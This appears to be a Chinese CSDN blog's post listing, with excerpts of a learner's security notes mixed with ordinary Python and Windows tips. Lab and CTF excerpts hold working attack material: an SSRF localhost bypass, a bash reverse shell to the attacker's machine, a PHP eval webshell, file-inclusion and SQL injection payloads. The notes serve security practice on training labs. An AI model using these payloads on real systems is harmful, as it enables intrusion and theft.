- 博客(31)
- 收藏
- 关注
RSS订阅原创 获取指定路径下所有文件名的绝对路径
第一种,pathlib(推荐)import pathlibpath = "目录路径"pp = pathlib.Path(path).rglob("*")print([i for i in pp])第二种,osimport ospath = "目录路径"print([path + j for j in [i for i in os.walk(path)][0][2]])他们只是穿着校服,就已经令我羡慕不已了...
2022-04-03 19:01:10
539
原创 buuctf [第三章 web进阶]Python里的SSRF 1
我看很多wp都没有提到这个绕过方式,分享一下1、直接访问node4.buuoj.cn:81/?url=http://127.0.0.1:8000/api/internal/secret2、使用0代替127.0.0.1绕过,访问node4.buuoj.cn:81/?url=http://0:8000/api/internal/secret3、得到flag...
2022-03-29 12:30:56
3973
原创 模糊哈希算法ssdeep替代模块
使用pyssdeep替代ssdeepwin的cl.exe老是出问题,有些包作者又不用win经过测试**pyssdeep.get_hash_buffer()和ssdeep.hash()**功能相同,**pyssdeep.compare()和ssdeep.compare()**功能相同,直接替代完事。gitgot改一改就可以直接在win上使用了模糊哈希算法常用与计算相似度...
2022-03-13 16:18:30
200
原创 IP聚合C段
import redef ip2c(ipNoDup): ipset = set() for ip in ipNoDup: ipset.add(re.findall(r'\d+?\.\d+?\.\d+?\.',ip)[0] + '0/24') iplist = list(ipset) iplist.sort() return iplistwith open('ip.txt','r',encoding='utf-8') as f: lists = ''.join(f.readlines(
2021-11-21 18:44:41
4337
原创 隐藏黑窗口的BAT脚本
最后一行换成你要执行的命令@echo offif "%1" == "h" goto beginmshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit:beginREMjava -jar .\Stegsolve.jar人无远虑,必有近忧
2021-10-06 16:07:04
1913
原创 python操作数组里的字典元素
a = [{'a':'b'},{'c':'d'}] # 数组里面存放字典元素 for i in a.copy(): # 拷贝出来 a.remove(i) print(a)
2021-08-04 21:43:05
816
原创 线程池异步执行多参数任务
话不多说直接上代码""" 线程池模块"""def multiThread(functionName, taskList, threadNum): from multiprocessing.pool import ThreadPool pool = ThreadPool(threadNum) pm = pool.starmap_async(functionName, taskList) pool.close() pool.join() return
2021-06-17 15:03:26
166
原创 python 查看函数的详细参数列表
import inspectprint(inspect.getfullargspec(Getwhatcms.apply_async))
2021-05-18 17:21:56
2349
原创 信息收集FAQ
信息&情报 -收集为什么要做信息收集?为什么使用ip和domain进行目录扫描?怎么样人工识别cms?目录扫描分爬行和爆破两种,伪静态网站影响目录爬行吗?为什么违法的网站会有多个类似域名?比如说.com .cn .net都是同一个网站为什么目录扫描的时候,www和不带www都要扫?如何发现并利用.git源码泄露?例如https://www.google.com/如何发现并利用.svn源码泄露?例如https://www.google.com/如何发现并利用WEB-INF/web.xml源码泄露?例如
2021-03-13 22:09:44
132
原创 selenium一键安装
vim selenium.sh粘贴 :wq保存 sudo sh selenium.sh运行wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.debsudo dpkg -i --force-depends google-chrome-stable_current_amd64.debLATEST=(wget−q−O−http://chromedriver.storage.googleapis.com/LAT
2021-02-04 10:12:09
135
原创 WEBSHELL&XSS
WebShellwebshell就是以asp、 php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。隐蔽性强 功能强大 穿越防火墙 无系统日志大马功能比较齐全的Webshell,由脚本语言编写,提供了文件操作、数据库管理、执行命令等功能,一般代码量比较大
2020-11-24 21:58:58
681
1
原创 文件包含&PHP伪协议
文件包含漏洞的常见利用思路:URL传一句话进去(bp抓包),文件包含日志文件执行http://127.0.0.1/include.php?file=../Apache/logs/access.log&666=phpinfo();//要使用php里面的功能就必须传一个参数进去PHP伪协议http://127.0.0.1/include.php?file=file://c:/Windows/win.ini路径必须是绝对路径php://filter读写文件(查账号密码)http://1
2020-11-24 21:53:42
163
1
原创 信息收集&命令注入&反序列化(dvwa)
信息收集zoomeye 钟馗之眼shodan 撒旦fofa采用hash搜索标签页上面的小图片http.favicon.hash:-842852785命令注入dvwa的命令执行漏洞利用测试是否存在命令注入127.0.0.1 | winver反弹shellkali监听7777端口 nc -lvp 7777注:测试环境Ubuntu虚拟机dvwa命令注入输入 ;bash -i >& /dev/tcp/kali的ip地址/7777 0>&1反序列化(对象注入)
2020-11-24 21:49:53
657
原创 终止代码 PAGE_FAULT_IN_NONPAGED AREA蓝屏解决办法<VM虚拟机>
VM虚拟机打开时宿主机蓝屏暂时不明原理,但经过调试,蓝屏现象不再复现系统分页文件大小设置为0虚拟机正常使用,不为0打开虚拟机的话,宿主机蓝屏,提示终止代码 PAGE_FAULT_IN_NONPAGED AREA解决办法,经过多次测试,关闭快速启动无效。。但是经过分析后将系统<C盘>分页文件设为无,其他盘仍存在分页文件(内存不够了,贫困潦倒的菜鸟博主>︿<),蓝屏现象不再复现...
2020-11-08 01:28:50
25683
16
原创 upload-labs 速通 less01-less21
非正常速通 >_< 懒使用的标准一句话,<?php @eval($_REQUEST[666])?>使用的标准图片马,copy 1.php/b + 1.png/b 1.jpg使用标准的中国蚁剑,http://127.0.0.1/upload-labs/include.php?file=upload/1.jpg使用的标准连接密码,666使用的标准编码设置,utf-8使用的标准连接类型,php使用的标准编码器,defaultless-01. 图片马less-02. 图片马
2020-11-06 22:18:44
235
原创 sql注入--sqli-labs-less1~9
常规注入127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),3–+less1字符型联合注入127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 union select 1,version(),3–+less2数字型联合注入127.0.0.1/sqlilabs/Less-3/?id=1’) and 1=2 union select 1,version(),3–+less3字符型联合注入127.
2020-10-23 22:38:36
88
原创 sqlmap的基本使用办法
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持13种数据库。sqlmap工作流程http://127.0.0.1/index.php?a=1&b=2&c=3当给sqNmap这么一个url的时候,它会:1.检测网站是否能够访问2.检测是否有waf3.判断可注入的参数sqlmap目录介绍doc目录,包含sqlmap的简要说明,具体使用说明、作者信息等。extra目录,包含了sqlmap的额外功能,例如发出声响、运行c
2020-10-20 12:02:48
409
原创 sqli-labs 盲注命令
sql盲注sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码查版本。?id=1’and left(version(),1)=5–+查库名。?id=1’and ascii(substr(database(),1,1))=115–+查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+查表长。?id=1’and length(subst
2020-10-16 12:13:08
260
原创 多重递归强制退出办法 -以下简称办法
办法深层递归函数return之后仍在执行递归的上一层,需要层层阻断,栈的问题,常规办法是设一个flag,层层阻断下面思考一个非常规办法,程序遇到什么情况会强制退出?答案显而易见,错误或异常,下面利用的是抛异常的思想,强行阻断函数运行看,搞定了是不是抛完顺手再抓一下,这种思路在Java等强类型的语言很容易就能想到,Java动不动就给你抛个空指针异常。。没事别用递归,for循环能搞定的事情,差点就想重写这段代码了办法很多,有时候可以试试非常规办法,如密码学上,DES对称加密解决不了密钥分配问题
2020-10-12 13:32:13
2497
1
原创 量子密码术
非零基础,可能写的有点杂数字签名,数字证书,hash函数DES私钥对称加密,RSA公钥非对称加密先认证后加密保证数据的保密性,认证性,完整性私钥加密效率高速度快,公钥能解决私钥的密钥分配问题,可用中国剩余定理和平方乘算法加速公钥算法,但是为了安全性又要调整算法牺牲效率来保证安全,太有趣了先用私钥加密数据再用公钥加密私钥,利用hash函数签名验证和权威机构颁发的数字证书,接收方先解密证书和签名,认证后解密数据 ->PGD密码加密的手法太巧妙了,陷门函数,求逆,扩展欧几里得算法,欧拉算法,都
2020-10-12 03:50:25
234
1
原创 渗透测试Day04 -NTFS权限 -文件共享 -PE破解密码
学习目标:渗透测试Day04熟练运用用户管理和远程管理熟悉NTFS文件权限学习内容:渗透测试基础什么叫文件系统?分区的存储格式(方式)windows FAT/NTFSlinux EXT存储越大的文件格式化时选择分配单元大小越大越好,碎小文件选择分配单元大小越小越好。原理:每个簇只能被一个文件用,簇越小存储利用率越高,指针越多,打开文件越慢;簇越大指针越少,打开文件越快,存储利用率较低NTSF才具有访问控制列表(设置权限)的功能,FAT无NTFS文件系统的优点有哪些
2020-10-05 19:04:37
147
原创 渗透测试Day03 -DOS命令 -用户管理 -远程管理 -破解windows密码
学习目标:渗透测试Day03熟练运用DOS命令管理用户熟悉图形化用户管理学习内容:渗透测试基础SID是唯一随机的安全标识符< 系统ID+用户ID组成 -最后几位是UID>UID是用户ID,windows系统管理员administrator默认UID是500,普通用户UID从1000开始,Linux系统管理员root默认UID是0账号密码的SAM文件路径在哪里?C:\Windows\System32\config\SAMSAM使用Hash不可逆算法加密,只能暴力破解或撞库
2020-10-05 04:12:13
383
原创 渗透测试Day02 -DOS命令 -BAT批处理
学习目标:标题渗透测试Day02熟练运用DOS命令熟悉BAT批处理脚本编写学习内容:提示:这里可以添加要学的内容@echo off 屏蔽回显(不显示执行过程)echo 打印字符串pause 暂停一下学习时间:提示:这里可以添加计划学习的时间例如:Two days学习产出:还行吧1、 技术笔记 2 遍2、 CSDN 技术博客 3 篇3、 学习的 vlog 视频 1 个...
2020-10-04 22:37:58
430
原创 渗透测试Day01 -VM虚拟机 -IP地址 -DOS命令
渗透测试Day01 命令行mstsc进行远程连接 services.msc打开服务管理窗口 gpedit.msc组策略 ip地址只能在同网段下通信,ip地址由网段+主机位组成 为什么分网段,因为同网段设备过多会瘫痪,广播量过大 子网掩码255对应网段的网络位,0对应主机位 一个ip地址必须配套一个子网掩码 0(网段的总称)和255(广播地址)不能使用 255.255.255.255全局广播地址 主机位不能全为0也不能全为255就是可用ip地址范围 ip地
2020-10-04 00:56:18
266
原创 Win10系统怎么--关闭烦人的自动更新
关闭烦人Win10系统自动更新讨厌的win10更新,老弹框,不过没必要不建议你关闭更新按住win+r快捷键打开一个运行窗口,输入命令services.msc打开服务管理窗口,然后右边下拉找到Windows Update双击启动类型下拉选择禁用,服务状态点击停止然后,往上看,常规按钮旁边有个恢复按钮,点它,第一次失败右边下拉选择无操作,后面两个也都选择无操作,与图中保持一致到这步,你以为你已经成功了?少年,你还是太天真。还是win+r快捷键打开运行窗口输入命令gpedit.msc打开组策略管理
2020-10-01 01:02:59
132
原创 kali虚拟机配置dhcp--桥接模式
kali虚拟机配置dhcp打开vm,编辑->虚拟网络编辑器->还原网络设置打开kali,开始配置dhcp试过编辑vi /etc/network/interfaces文件,没什么效果网卡移除再重新添加,选择桥接(不复制物理机连接状态),确定双击kali网络的小图标选择ipv4 setting,选择dhcp成功了。...
2020-09-28 23:49:59
4544
3
原创 Sqli_Edited_Version安装,完美解决php7.0+版本问题
新手上路,sqli安装Github链接https://github.com/Rinkish/Sqli_Edited_Version解压Sqli_Edited_Version先解压到phpstudy的www目录下,phpstudy教程很多,这里不介绍了。修改Sqli配置文件,路径在 WWW\sqlilabs\sql-connections\db-creds.inc,将配置文件用记事本或者Sublime打开db-creds.inc修改你的用户名和密码。然后浏览器访问sqli,选择第二项rese
2020-09-27 12:34:06
407
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人